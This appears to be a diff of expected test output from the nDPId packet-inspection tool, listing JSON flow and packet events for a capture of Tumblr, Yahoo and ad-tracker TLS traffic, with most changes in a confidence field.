{"version":"TLSv1.2","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":436,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105418,"flow_last_seen":1605292105448,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":620,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1605292105448,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":437,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1605292105459,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105459,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSABSZgAFAgAAAAAAAAAEAEqAcsBIEmLB5kd7IUo3\/YpAbu4DgNW0a1gJBeUoBJXgDGmAAACBAV4AQMDAwQCCArC3Z7jvgPSEA=="} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":438,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1605292105459,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292105459,"pkt":"qtsDr8lk5EKm5WPyht1gCUBCACAGQCoBywEgSYsHmR3shSjf9ikgAUmYABQIAAAAAAAAABABuA4Bu2AkF5QDVtGugBAB+7WdAAABAQgKvgPSKsLdnuM="} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105433,"flow_last_seen":1605292105459,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292105459,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Yahoo","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cookiex.ngd.yahoo.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00988{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":442,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292105418,"flow_last_seen":1605292105494,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1605292105494,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105433,"flow_last_seen":1605292105459,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292105459,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Yahoo","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cookiex.ngd.yahoo.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00988{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":442,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292105418,"flow_last_seen":1605292105494,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1605292105494,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":454,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105669,"flow_last_seen":1605292105669,"flow_idle_time":7580000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":1,"thread_ts_msec":1605292105669,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1605292105669,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":206,"pkt_l4_len":152,"thread_ts_msec":1605292105669,"pkt":"qtsDr8lk5EKm5WPyht1gCP\/sAJgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0D3doBu3fKOk4W2C\/9gBhA0URlAAABAQgKBcmbq8LdLRcXAwMAcysuUqnNdP5CtlTC2pWvfZyUMV8UFocs8M6W09NnsspPibPhqobMFIm1f0B4kk13U59rzTyXjGQM3JpbSJkQg4GGmBSNMo7KgMloXnt3GygjcT75OOC0YPo3\/MFdKUwkpDu47ubalsF7IwgRDAn\/l0DFoLo="} -00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105669,"flow_last_seen":1605292105669,"flow_idle_time":7580000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":1,"thread_ts_msec":1605292105669,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105669,"flow_last_seen":1605292105669,"flow_idle_time":7580000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":1,"thread_ts_msec":1605292105669,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1605292105669,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292105669,"pkt":"qtsDr8lk5EKm5WPyht1gCP\/sAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0D3doBu3fKOsYW2C\/9gBhA0ehRAAABAQgKBcmbrMLdLRcXAwMAIgQb59HIMHYAgoaCAJqbMMjq72ntBt\/\/eGErLyXH34Iczsk="} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1605292105669,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":215,"pkt_l4_len":161,"thread_ts_msec":1605292105669,"pkt":"qtsDr8lk5EKm5WPyht1gCP\/sAKEGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0D3doBu3fKOu0W2C\/9gBhA0aEtAAABAQgKBcmbrMLdLRcXAwMAfBkhBkIFqMuMKjD1\/xjqGp2hEKMP3ziLomYjJXbyDDBzMNKC8MmFqfqAj9+xvxfAO7rBldu4UpazYVXmg399TnFcypI7qckvMpQyy6kehQ5F75J5BlTYjgokme9I6h8+9mS8Y6D2WQEp5qh0Ix9\/vReZo1xT0xocl8k7wFQ="} -00675{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":485,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105669,"flow_last_seen":1605292105720,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":11638,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1605292105720,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00675{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":485,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105669,"flow_last_seen":1605292105720,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":11638,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1605292105720,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":492,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105726,"flow_last_seen":1605292105726,"flow_idle_time":7580000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":127,"midstream":1,"thread_ts_msec":1605292105726,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4c03","src_port":51874,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1605292105726,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":213,"pkt_l4_len":159,"thread_ts_msec":1605292105726,"pkt":"qtsDr8lk5EKm5WPyht1gBYNxAJ8GQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAEwDyqIBu7npntnZTJergBgB9damAAABAQgKLIniTsLdLfkXAwMAepLzP8oRHbXAD5D56fW\/ezxXNRxKdaqM6BwQpjw0zyORx06Rl8gHWinoWY19NxmIXl2owLgVHJ\/UEVkHmda\/PMinu6FgCqLeUi5RUsVJaGqL1ulKRH6Mi5nxYau2z9M9f+jUaBIVXH47AOoxy+jPs5YTh+8Es3OdfTIr"} -00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":492,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105726,"flow_last_seen":1605292105726,"flow_idle_time":7580000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":127,"midstream":1,"thread_ts_msec":1605292105726,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4c03","src_port":51874,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":492,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105726,"flow_last_seen":1605292105726,"flow_idle_time":7580000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":127,"midstream":1,"thread_ts_msec":1605292105726,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4c03","src_port":51874,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":493,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1605292105726,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292105726,"pkt":"qtsDr8lk5EKm5WPyht1gBYNxAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAEwDyqIBu7npn1jZTJergBgB9c+fAAABAQgKLIniTsLdLfkXAwMAInb0OIEXDizCLxamWTiLwYinYzi396zhkwGnl1I5tNs4gXU="} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":568,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1605292105774,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292105774,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAMAATAMqAcsBIEmLB5kd7IUo3\/YpAbvKotlMl6u56Z9YgBALghHTAAABAQgKwt2gFiyJ4k4="} -00988{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":574,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292105433,"flow_last_seen":1605292105774,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605292105774,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Yahoo","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cookiex.ngd.yahoo.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00988{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":574,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292105433,"flow_last_seen":1605292105774,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605292105774,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Yahoo","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cookiex.ngd.yahoo.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2777,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292108746,"flow_last_seen":1605292108746,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292108746,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2777,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1605292108746,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108746,"pkt":"qtsDr8lk5EKm5WPyht1gBAJCACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QYBu4l3wyDoZi2igBBBsd06AAABAQgKqXtZHsLc+wU="} 00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2778,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292108746,"flow_last_seen":1605292108746,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292108746,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -90,8 +90,8 @@ 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2839,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1605292108895,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292108895,"pkt":"qtsDr8lk5EKm5WPyht1gCOgvACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0D3goBu3qld1IAAAAAoAL9IHkiAAACBAWgBAIICgXJqEYAAAAAAQMDBw=="} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2848,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1605292108917,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292108917,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAMAATQMqAcsBIEmLB5kd7IUo3\/YpAbveCh3iVUV6pXdToBJXgDxxAAACBAV4AQMDAwQCCArC3axnBcmoRg=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2849,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1605292108917,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108917,"pkt":"qtsDr8lk5EKm5WPyht1gCOgvACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0D3goBu3qld1Md4lVGgBAB+8BsAAABAQgKBcmoXMLdrGc="} -00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2850,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292108895,"flow_last_seen":1605292108918,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292108918,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56842,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"64.media.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2953,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292108895,"flow_last_seen":1605292108973,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":1917,"flow_avg_l4_payload_len":319,"midstream":0,"thread_ts_msec":1605292108973,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56842,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"64.media.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2850,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292108895,"flow_last_seen":1605292108918,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292108918,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56842,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"64.media.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2953,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292108895,"flow_last_seen":1605292108973,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":1917,"flow_avg_l4_payload_len":319,"midstream":0,"thread_ts_msec":1605292108973,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56842,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"64.media.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12579,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292114506,"flow_last_seen":1605292114506,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292114506,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12579,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1605292114506,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292114506,"pkt":"qtsDr8lk5EKm5WPyht1gCYCjACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3O4Bu5iknWH70O\/fgBATex8tAAABAQgKqXtvnsLdEcs="} 